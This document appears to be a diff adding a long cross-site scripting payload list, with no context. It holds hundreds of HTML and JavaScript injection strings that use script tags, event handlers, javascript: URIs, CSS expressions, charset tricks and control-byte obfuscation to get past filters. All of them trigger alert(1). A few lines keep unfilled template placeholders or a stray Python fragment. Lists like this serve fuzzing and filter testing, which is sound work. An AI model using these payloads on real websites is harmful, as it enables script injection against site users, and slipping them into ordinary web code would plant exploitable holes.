+<IFRAME SRC="javascript:javascript:alert(1);"></IFRAME> +<TABLE BACKGROUND="javascript:javascript:alert(1)"> +<TABLE><TD BACKGROUND="javascript:javascript:alert(1)"> +<DIV STYLE="background-image: url(javascript:javascript:alert(1))"> +<DIV STYLE="width:expression(javascript:alert(1));"> +<IMG STYLE="xss:expr/*XSS*/ession(javascript:alert(1))"> +<XSS STYLE="xss:expression(javascript:alert(1))"> +<STYLE TYPE="text/javascript">javascript:alert(1);</STYLE> +<STYLE>.XSS{background-image:url("javascript:javascript:alert(1)");}</STYLE><A CLASS=XSS></A> +<STYLE type="text/css">BODY{background:url("javascript:javascript:alert(1)")}</STYLE> +<!--[if gte IE 4]><SCRIPT>javascript:alert(1);</SCRIPT><![endif]--> +<BASE HREF="javascript:javascript:alert(1);//"> +<OBJECT TYPE="text/x-scriptlet" DATA="%(scriptlet)s"></OBJECT> +<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:javascript:alert(1)></OBJECT> +<HTML xmlns:xss><?import namespace="xss" implementation="%(htc)s"><xss:xss>XSS</xss:xss></HTML>""","XML namespace."),("""<XML ID="xss"><I><B>&lt;IMG SRC="javas<!-- -->cript:javascript:alert(1)"&gt;</B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN> +<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS&lt;SCRIPT DEFER&gt;javascript:alert(1)&lt;/SCRIPT&gt;"></BODY></HTML> +<SCRIPT SRC="%(jpg)s"></SCRIPT> +<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-%(payload)s;+ADw-/SCRIPT+AD4- +<form id="test" /><button form="test" formaction="javascript:javascript:alert(1)">X +<body onscroll=javascript:alert(1)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus> +<P STYLE="behavior:url('#default#time2')" end="0" onEnd="javascript:alert(1)"> +<STYLE>@import'%(css)s';</STYLE> +<STYLE>a{background:url('s1' 's2)}@import javascript:javascript:alert(1);');}</STYLE> +<meta charset= "x-imap4-modified-utf7"&&>&&<script&&>javascript:alert(1)&&;&&<&&/script&&> +<SCRIPT onreadystatechange=javascript:javascript:alert(1);></SCRIPT> +<style onreadystatechange=javascript:javascript:alert(1);></style> +<?xml version="1.0"?><html:html xmlns:html='http://www.w3.org/1999/xhtml'><html:script>javascript:alert(1);</html:script></html:html> +<embed code=%(scriptlet)s></embed> +<embed code=javascript:javascript:alert(1);></embed> +<embed src=%(jscript)s></embed> +<frameset onload=javascript:javascript:alert(1)></frameset> +script\x20type="text/javascript">javascript:alert(1);</script> +<script\x3Etype="text/javascript">javascript:alert(1);</script> +<script\x0Dtype="text/javascript">javascript:alert(1);</script> +<script\x09type="text/javascript">javascript:alert(1);</script> +<script\x0Ctype="text/javascript">javascript:alert(1);</script> +</script><script>alert(1);</script> +<script\x2Ftype="text/javascript">javascript:alert(1);</script> +<script\x0Atype="text/javascript">javascript:alert(1);</script> +'`"><\x3Cscript>javascript:alert(1)</script> +'`"><\x00script>javascript:alert(1)</script> +<img src=1 href=1 onerror="javascript:alert(1)"></img> +<audio src=1 href=1 onerror="javascript:alert(1)"></audio> +<video src=1 href=1 onerror="javascript:alert(1)"></video> +<body src=1 href=1 onerror="javascript:alert(1)"></body> +<image src=1 href=1 onerror="javascript:alert(1)"></image> +<object src=1 href=1 onerror="javascript:alert(1)"></object> +<script src=1 href=1 onerror="javascript:alert(1)"></script> +<svg onResize svg onResize="javascript:javascript:alert(1)"></svg onResize> +<title onPropertyChange title onPropertyChange="javascript:javascript:alert(1)"></title onPropertyChange> +<iframe onLoad iframe onLoad="javascript:javascript:alert(1)"></iframe onLoad> +<body onMouseEnter body onMouseEnter="javascript:javascript:alert(1)"></body onMouseEnter> +<body onFocus body onFocus="javascript:javascript:alert(1)"></body onFocus> +<frameset onScroll frameset onScroll="javascript:javascript:alert(1)"></frameset onScroll> +<script onReadyStateChange script onReadyStateChange="javascript:javascript:alert(1)"></script onReadyStateChange> +<html onMouseUp html onMouseUp="javascript:javascript:alert(1)"></html onMouseUp> +<body onPropertyChange body onPropertyChange="javascript:javascript:alert(1)"></body onPropertyChange> +<svg onLoad svg onLoad="javascript:javascript:alert(1)"></svg onLoad> +<body onPageHide body onPageHide="javascript:javascript:alert(1)"></body onPageHide> +<body onMouseOver body onMouseOver="javascript:javascript:alert(1)"></body onMouseOver> +<body onUnload body onUnload="javascript:javascript:alert(1)"></body onUnload> +<body onLoad body onLoad="javascript:javascript:alert(1)"></body onLoad> +<bgsound onPropertyChange bgsound onPropertyChange="javascript:javascript:alert(1)"></bgsound onPropertyChange> +<html onMouseLeave html onMouseLeave="javascript:javascript:alert(1)"></html onMouseLeave> +<html onMouseWheel html onMouseWheel="javascript:javascript:alert(1)"></html onMouseWheel> +<style onLoad style onLoad="javascript:javascript:alert(1)"></style onLoad> +<iframe onReadyStateChange iframe onReadyStateChange="javascript:javascript:alert(1)"></iframe onReadyStateChange> +<body onPageShow body onPageShow="javascript:javascript:alert(1)"></body onPageShow> +<style onReadyStateChange style onReadyStateChange="javascript:javascript:alert(1)"></style onReadyStateChange> +<frameset onFocus frameset onFocus="javascript:javascript:alert(1)"></frameset onFocus> +<applet onError applet onError="javascript:javascript:alert(1)"></applet onError> +<marquee onStart marquee onStart="javascript:javascript:alert(1)"></marquee onStart> +<script onLoad script onLoad="javascript:javascript:alert(1)"></script onLoad> +<html onMouseOver html onMouseOver="javascript:javascript:alert(1)"></html onMouseOver> +<html onMouseEnter html onMouseEnter="javascript:parent.javascript:alert(1)"></html onMouseEnter> +<body onBeforeUnload body onBeforeUnload="javascript:javascript:alert(1)"></body onBeforeUnload> +<html onMouseDown html onMouseDown="javascript:javascript:alert(1)"></html onMouseDown> +<marquee onScroll marquee onScroll="javascript:javascript:alert(1)"></marquee onScroll> +<xml onPropertyChange xml onPropertyChange="javascript:javascript:alert(1)"></xml onPropertyChange> +<frameset onBlur frameset onBlur="javascript:javascript:alert(1)"></frameset onBlur> +<applet onReadyStateChange applet onReadyStateChange="javascript:javascript:alert(1)"></applet onReadyStateChange> +<svg onUnload svg onUnload="javascript:javascript:alert(1)"></svg onUnload> +<html onMouseOut html onMouseOut="javascript:javascript:alert(1)"></html onMouseOut> +<body onMouseMove body onMouseMove="javascript:javascript:alert(1)"></body onMouseMove> +<body onResize body onResize="javascript:javascript:alert(1)"></body onResize> +<object onError object onError="javascript:javascript:alert(1)"></object onError> +<body onPopState body onPopState="javascript:javascript:alert(1)"></body onPopState> +<html onMouseMove html onMouseMove="javascript:javascript:alert(1)"></html onMouseMove> +<applet onreadystatechange applet onreadystatechange="javascript:javascript:alert(1)"></applet onreadystatechange> +<body onpagehide body onpagehide="javascript:javascript:alert(1)"></body onpagehide> +<svg onunload svg onunload="javascript:javascript:alert(1)"></svg onunload> +<applet onerror applet onerror="javascript:javascript:alert(1)"></applet onerror> +<body onkeyup body onkeyup="javascript:javascript:alert(1)"></body onkeyup> +<body onunload body onunload="javascript:javascript:alert(1)"></body onunload> +<iframe onload iframe onload="javascript:javascript:alert(1)"></iframe onload> +<body onload body onload="javascript:javascript:alert(1)"></body onload> +<html onmouseover html onmouseover="javascript:javascript:alert(1)"></html onmouseover> +<object onbeforeload object onbeforeload="javascript:javascript:alert(1)"></object onbeforeload> +<body onbeforeunload body onbeforeunload="javascript:javascript:alert(1)"></body onbeforeunload> +<body onfocus body onfocus="javascript:javascript:alert(1)"></body onfocus> +<body onkeydown body onkeydown="javascript:javascript:alert(1)"></body onkeydown> +<iframe onbeforeload iframe onbeforeload="javascript:javascript:alert(1)"></iframe onbeforeload> +<iframe src iframe src="javascript:javascript:alert(1)"></iframe src> +<svg onload svg onload="javascript:javascript:alert(1)"></svg onload> +<html onmousemove html onmousemove="javascript:javascript:alert(1)"></html onmousemove> +<body onblur body onblur="javascript:javascript:alert(1)"></body onblur> +\x3Cscript>javascript:alert(1)</script> +'"`><script>/* *\x2Fjavascript:alert(1)// */</script> +<script>javascript:alert(1)</script\x0D +<script>javascript:alert(1)</script\x0A +<script>javascript:alert(1)</script\x0B +<script charset="\x22>javascript:alert(1)</script> +<!--\x3E<img src=xxx:x onerror=javascript:alert(1)> --> +--><!-- ---> <img src=xxx:x onerror=javascript:alert(1)> --> +--><!-- --\x00> <img src=xxx:x onerror=javascript:alert(1)> --> +--><!-- --\x21> <img src=xxx:x onerror=javascript:alert(1)> --> +--><!-- --\x3E> <img src=xxx:x onerror=javascript:alert(1)> --> +`"'><img src='#\x27 onerror=javascript:alert(1)> +<a href="javascript\x3Ajavascript:alert(1)" id="fuzzelement1">test</a> +"'`><p><svg><script>a='hello\x27;javascript:alert(1)//';</script></p> +<a href="javas\x00cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x07cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x0Dcript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x0Acript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x08cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x02cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x03cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x04cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x01cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x05cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x0Bcript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x09cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x06cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x0Ccript:javascript:alert(1)" id="fuzzelement1">test</a> +<script>/* *\x2A/javascript:alert(1)// */</script> +<script>/* *\x00/javascript:alert(1)// */</script> +<style></style\x3E<img src="about:blank" onerror=javascript:alert(1)//></style> +<style></style\x0D<img src="about:blank" onerror=javascript:alert(1)//></style> +<style></style\x09<img src="about:blank" onerror=javascript:alert(1)//></style> +<style></style\x20<img src="about:blank" onerror=javascript:alert(1)//></style> +<style></style\x0A<img src="about:blank" onerror=javascript:alert(1)//></style> +"'`>ABC<div style="font-family:'foo'\x7Dx:expression(javascript:alert(1);/*';">DEF +"'`>ABC<div style="font-family:'foo'\x3Bx:expression(javascript:alert(1);/*';">DEF +<script>if("x\\xE1\x96\x89".length==2) { javascript:alert(1);}</script> +<script>if("x\\xE0\xB9\x92".length==2) { javascript:alert(1);}</script> +<script>if("x\\xEE\xA9\x93".length==2) { javascript:alert(1);}</script> +'`"><\x3Cscript>javascript:alert(1)</script> +'`"><\x00script>javascript:alert(1)</script> +"'`><\x3Cimg src=xxx:x onerror=javascript:alert(1)> +"'`><\x00img src=xxx:x onerror=javascript:alert(1)> +<script src="data:text/plain\x2Cjavascript:alert(1)"></script> +<script src="data:\xD4\x8F,javascript:alert(1)"></script> +<script src="data:\xE0\xA4\x98,javascript:alert(1)"></script> +<script src="data:\xCB\x8F,javascript:alert(1)"></script> +<script\x20type="text/javascript">javascript:alert(1);</script> +<script\x3Etype="text/javascript">javascript:alert(1);</script> +<script\x0Dtype="text/javascript">javascript:alert(1);</script> +<script\x09type="text/javascript">javascript:alert(1);</script> +<script\x0Ctype="text/javascript">javascript:alert(1);</script> +<script\x2Ftype="text/javascript">javascript:alert(1);</script> +<script\x0Atype="text/javascript">javascript:alert(1);</script> +ABC<div style="x\x3Aexpression(javascript:alert(1)">DEF +ABC<div style="x:expression\x5C(javascript:alert(1)">DEF +ABC<div style="x:expression\x00(javascript:alert(1)">DEF +ABC<div style="x:exp\x00ression(javascript:alert(1)">DEF +ABC<div style="x:exp\x5Cression(javascript:alert(1)">DEF +ABC<div style="x:\x0Aexpression(javascript:alert(1)">DEF +ABC<div style="x:\x09expression(javascript:alert(1)">DEF +ABC<div style="x:\xE3\x80\x80expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x84expression(javascript:alert(1)">DEF +ABC<div style="x:\xC2\xA0expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x80expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x8Aexpression(javascript:alert(1)">DEF +ABC<div style="x:\x0Dexpression(javascript:alert(1)">DEF +ABC<div style="x:\x0Cexpression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x87expression(javascript:alert(1)">DEF +ABC<div style="x:\xEF\xBB\xBFexpression(javascript:alert(1)">DEF +ABC<div style="x:\x20expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x88expression(javascript:alert(1)">DEF +ABC<div style="x:\x00expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x8Bexpression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x86expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x85expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x82expression(javascript:alert(1)">DEF +ABC<div style="x:\x0Bexpression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x81expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x83expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x89expression(javascript:alert(1)">DEF +<a href="\x0Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x0Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xC2\xA0javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x05javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE1\xA0\x8Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x18javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x11javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x88javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x89javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x17javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x03javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x0Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x00javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x10javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x82javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x20javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x13javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x09javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x8Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x14javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x19javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\xAFjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x81javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Djavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x87javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x07javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE1\x9A\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x83javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x04javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x01javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x08javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x84javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x86javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE3\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x12javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x0Djavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x0Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x0Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x15javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\xA8javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x16javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x02javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x06javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\xA9javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x85javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x81\x9Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javascript\x00:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javascript\x3A:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javascript\x09:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javascript\x0D:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javascript\x0A:javascript:alert(1)" id="fuzzelement1">test</a> +`"'><img src=xxx:x \x0Aonerror=javascript:alert(1)> +`"'><img src=xxx:x \x22onerror=javascript:alert(1)> +`"'><img src=xxx:x \x0Bonerror=javascript:alert(1)> +`"'><img src=xxx:x \x0Donerror=javascript:alert(1)> +`"'><img src=xxx:x \x2Fonerror=javascript:alert(1)> +`"'><img src=xxx:x \x09onerror=javascript:alert(1)> +`"'><img src=xxx:x \x0Conerror=javascript:alert(1)> +`"'><img src=xxx:x \x00onerror=javascript:alert(1)> +`"'><img src=xxx:x \x27onerror=javascript:alert(1)> +`"'><img src=xxx:x \x20onerror=javascript:alert(1)> +"`'><script>\x3Bjavascript:alert(1)</script> +"`'><script>\x0Djavascript:alert(1)</script> +"`'><script>\xEF\xBB\xBFjavascript:alert(1)</script> +"`'><script>\xE2\x80\x81javascript:alert(1)</script> +"`'><script>\xE2\x80\x84javascript:alert(1)</script> +"`'><script>\xE3\x80\x80javascript:alert(1)</script> +"`'><script>\x09javascript:alert(1)</script> +"`'><script>\xE2\x80\x89javascript:alert(1)</script> +"`'><script>\xE2\x80\x85javascript:alert(1)</script> +"`'><script>\xE2\x80\x88javascript:alert(1)</script> +"`'><script>\x00javascript:alert(1)</script> +"`'><script>\xE2\x80\xA8javascript:alert(1)</script> +"`'><script>\xE2\x80\x8Ajavascript:alert(1)</script> +"`'><script>\xE1\x9A\x80javascript:alert(1)</script> +"`'><script>\x0Cjavascript:alert(1)</script> +"`'><script>\x2Bjavascript:alert(1)</script> +"`'><script>\xF0\x90\x96\x9Ajavascript:alert(1)</script> +"`'><script>-javascript:alert(1)</script> +"`'><script>\x0Ajavascript:alert(1)</script> +"`'><script>\xE2\x80\xAFjavascript:alert(1)</script> +"`'><script>\x7Ejavascript:alert(1)</script> +"`'><script>\xE2\x80\x87javascript:alert(1)</script> +"`'><script>\xE2\x81\x9Fjavascript:alert(1)</script> +"`'><script>\xE2\x80\xA9javascript:alert(1)</script> +"`'><script>\xC2\x85javascript:alert(1)</script> +"`'><script>\xEF\xBF\xAEjavascript:alert(1)</script> +"`'><script>\xE2\x80\x83javascript:alert(1)</script> +"`'><script>\xE2\x80\x8Bjavascript:alert(1)</script> +"`'><script>\xEF\xBF\xBEjavascript:alert(1)</script> +"`'><script>\xE2\x80\x80javascript:alert(1)</script> +"`'><script>\x21javascript:alert(1)</script> +"`'><script>\xE2\x80\x82javascript:alert(1)</script> +"`'><script>\xE2\x80\x86javascript:alert(1)</script> +"`'><script>\xE1\xA0\x8Ejavascript:alert(1)</script> +"`'><script>\x0Bjavascript:alert(1)</script> +"`'><script>\x20javascript:alert(1)</script> +"`'><script>\xC2\xA0javascript:alert(1)</script> +"/><img/onerror=\x0Bjavascript:alert(1)\x0Bsrc=xxx:x /> +"/><img/onerror=\x22javascript:alert(1)\x22src=xxx:x /> +"/><img/onerror=\x09javascript:alert(1)\x09src=xxx:x /> +"/><img/onerror=\x27javascript:alert(1)\x27src=xxx:x /> +"/><img/onerror=\x0Ajavascript:alert(1)\x0Asrc=xxx:x /> +"/><img/onerror=\x0Cjavascript:alert(1)\x0Csrc=xxx:x /> +"/><img/onerror=\x0Djavascript:alert(1)\x0Dsrc=xxx:x /> +"/><img/onerror=\x60javascript:alert(1)\x60src=xxx:x /> +"/><img/onerror=\x20javascript:alert(1)\x20src=xxx:x /> +<script\x2F>javascript:alert(1)</script> +<script\x20>javascript:alert(1)</script> +<script\x0D>javascript:alert(1)</script> +<script\x0A>javascript:alert(1)</script> +<script\x0C>javascript:alert(1)</script> +<script\x00>javascript:alert(1)</script> +<script\x09>javascript:alert(1)</script> +`"'><img src=xxx:x onerror\x0B=javascript:alert(1)> +`"'><img src=xxx:x onerror\x00=javascript:alert(1)> +`"'><img src=xxx:x onerror\x0C=javascript:alert(1)> +`"'><img src=xxx:x onerror\x0D=javascript:alert(1)> +`"'><img src=xxx:x onerror\x20=javascript:alert(1)> +`"'><img src=xxx:x onerror\x0A=javascript:alert(1)> +`"'><img src=xxx:x onerror\x09=javascript:alert(1)> +<script>javascript:alert(1)<\x00/script> +<img src=# onerror\x3D"javascript:alert(1)" > +<input onfocus=javascript:alert(1) autofocus> +<input onblur=javascript:alert(1) autofocus><input autofocus> +<video poster=javascript:javascript:alert(1)// +<body onscroll=javascript:alert(1)><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><input autofocus> +<form id=test onforminput=javascript:alert(1)><input></form><button form=test onformchange=javascript:alert(1)>X +<video><source onerror="javascript:javascript:alert(1)"> +<video onerror="javascript:javascript:alert(1)"><source> +<form><button formaction="javascript:javascript:alert(1)">X +<body oninput=javascript:alert(1)><input autofocus> +<math href="javascript:javascript:alert(1)">CLICKME</math> <math> <maction actiontype="statusline#http://google.com" xlink:href="javascript:javascript:alert(1)">CLICKME</maction> </math> +<frameset onload=javascript:alert(1)> +<table background="javascript:javascript:alert(1)"> +<!--<img src="--><img src=x onerror=javascript:alert(1)//"> +<comment><img src="</comment><img src=x onerror=javascript:alert(1))//"> +<![><img src="]><img src=x onerror=javascript:alert(1)//"> +<style><img src="</style><img src=x onerror=javascript:alert(1)//"> +<li style=list-style:url() onerror=javascript:alert(1)> <div style=content:url(data:image/svg+xml,%%3Csvg/%%3E);visibility:hidden onload=javascript:alert(1)></div> +<head><base href="javascript://"></head><body><a href="/. /,javascript:alert(1)//#">XXX</a></body> +<SCRIPT FOR=document EVENT=onreadystatechange>javascript:alert(1)</SCRIPT> +<OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(1)"></OBJECT> +<object data="data:text/html;base64,%(base64)s"> +<embed src="data:text/html;base64,%(base64)s"> +<b <script>alert(1)</script>0 +<div id="div1"><input value="``onmouseover=javascript:alert(1)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script> +<x '="foo"><x foo='><img src=x onerror=javascript:alert(1)//'> +<embed src="javascript:alert(1)"> +<img src="javascript:alert(1)"> +<image src="javascript:alert(1)"> +<script src="javascript:alert(1)"> +<div style=width:1px;filter:glow onfilterchange=javascript:alert(1)>x +<? foo="><script>javascript:alert(1)</script>"> +<! foo="><script>javascript:alert(1)</script>"> +</ foo="><script>javascript:alert(1)</script>"> +<? foo="><x foo='?><script>javascript:alert(1)</script>'>"> +<! foo="[[[Inception]]"><x foo="]foo><script>javascript:alert(1)</script>"> +<% foo><x foo="%><script>javascript:alert(1)</script>"> +<div id=d><x xmlns="><iframe onload=javascript:alert(1)"></div> <script>d.innerHTML=d.innerHTML</script> +<img \x00src=x onerror="alert(1)"> +<img \x47src=x onerror="javascript:alert(1)"> +<img \x11src=x onerror="javascript:alert(1)"> +<img \x12src=x onerror="javascript:alert(1)"> +<img\x47src=x onerror="javascript:alert(1)"> +<img\x10src=x onerror="javascript:alert(1)"> +<img\x13src=x onerror="javascript:alert(1)"> +<img\x32src=x onerror="javascript:alert(1)"> +<img\x47src=x onerror="javascript:alert(1)"> +<img\x11src=x onerror="javascript:alert(1)"> +<img \x47src=x onerror="javascript:alert(1)"> +<img \x34src=x onerror="javascript:alert(1)"> +<img \x39src=x onerror="javascript:alert(1)"> +<img \x00src=x onerror="javascript:alert(1)"> +<img src\x09=x onerror="javascript:alert(1)"> +<img src\x10=x onerror="javascript:alert(1)"> +<img src\x13=x onerror="javascript:alert(1)"> +<img src\x32=x onerror="javascript:alert(1)"> +<img src\x12=x onerror="javascript:alert(1)"> +<img src\x11=x onerror="javascript:alert(1)"> +<img src\x00=x onerror="javascript:alert(1)"> +<img src\x47=x onerror="javascript:alert(1)"> +<img src=x\x09onerror="javascript:alert(1)"> +<img src=x\x10onerror="javascript:alert(1)"> +<img src=x\x11onerror="javascript:alert(1)"> +<img src=x\x12onerror="javascript:alert(1)"> +<img src=x\x13onerror="javascript:alert(1)"> +<img[a][b][c]src[d]=x[e]onerror=[f]"alert(1)"> +<img src=x onerror=\x09"javascript:alert(1)"> +<img src=x onerror=\x10"javascript:alert(1)"> +<img src=x onerror=\x11"javascript:alert(1)"> +<img src=x onerror=\x12"javascript:alert(1)"> +<img src=x onerror=\x32"javascript:alert(1)"> +<img src=x onerror=\x00"javascript:alert(1)"> +<a href=java&#1&#2&#3&#4&#5&#6&#7&#8&#11&#12script:javascript:alert(1)>XXX</a> +<img src="x` `<script>javascript:alert(1)</script>"` `> +<img src onerror /" '"= alt=javascript:alert(1)//"> +<title onpropertychange=javascript:alert(1)></title><title title=> +<a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=javascript:alert(1)></a>"> +<!--[if]><script>javascript:alert(1)</script --> +<!--[if<img src=x onerror=javascript:alert(1)//]> --> +<script src="/\%(jscript)s"></script> +<script src="\\%(jscript)s"></script> +<object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object> <object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="javascript:alert(1)" style="behavior:url(#x);"><param name=postdomevents /></object> +<a style="-o-link:'javascript:javascript:alert(1)';-o-link-source:current">X +<style>p[foo=bar{}*{-o-link:'javascript:javascript:alert(1)'}{}*{-o-link-source:current}]{color:red};</style> +<link rel=stylesheet href=data:,*%7bx:expression(javascript:alert(1))%7d +<style>@import "data:,*%7bx:expression(javascript:alert(1))%7D";</style> +<a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="javascript:alert(1);">XXX</a></a><a href="javascript:javascript:alert(1)">XXX</a> +<style>*[{}@import'%(css)s?]</style>X +<div style="font-family:'foo&#10;;color:red;';">XXX +<div style="font-family:foo}color=red;">XXX +<// style=x:expression\28javascript:alert(1)\29> +<style>*{x:expression(javascript:alert(1))}</style> +<div style=content:url(%(svg)s)></div> +<div style="list-style:url(http://foo.f)\20url(javascript:javascript:alert(1));">X +<div id=d><div style="font-family:'sans\27\3B color\3Ared\3B'">X</div></div> <script>with(document.getElementById("d"))innerHTML=innerHTML</script> +<div style="background:url(/f#&#127;oo/;color:red/*/foo.jpg);">X +<div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X +<div id="x">XXX</div> <style> #x{font-family:foo[bar;color:green;} #y];color:red;{} </style> +<x style="background:url('x&#1;;color:red;/*')">XXX</x> +<script>({set/**/$($){_/**/setter=$,_=javascript:alert(1)}}).$=eval</script> +<script>({0:#0=eval/#0#/#0#(javascript:alert(1))})</script> +<script>ReferenceError.prototype.__defineGetter__('name', function(){javascript:alert(1)}),x</script> +<script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('javascript:alert(1)')()</script> +<meta charset="x-imap4-modified-utf7">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi +<meta charset="x-imap4-modified-utf7">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&> +<meta charset="mac-farsi">¼script¾javascript:alert(1)¼/script¾ +X<x style=`behavior:url(#default#time2)` onbegin=`javascript:alert(1)` > +1<set/xmlns=`urn:schemas-microsoft-com:time` style=`beh&#x41vior:url(#default#time2)` attributename=`innerhtml` to=`&lt;img/src=&quot;x&quot;onerror=javascript:alert(1)&gt;`> +1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=&lt;img/src=&quot;.&quot;onerror=javascript:alert(1)&gt;> +<vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100% src=%(vml)s#xss></vmlframe> 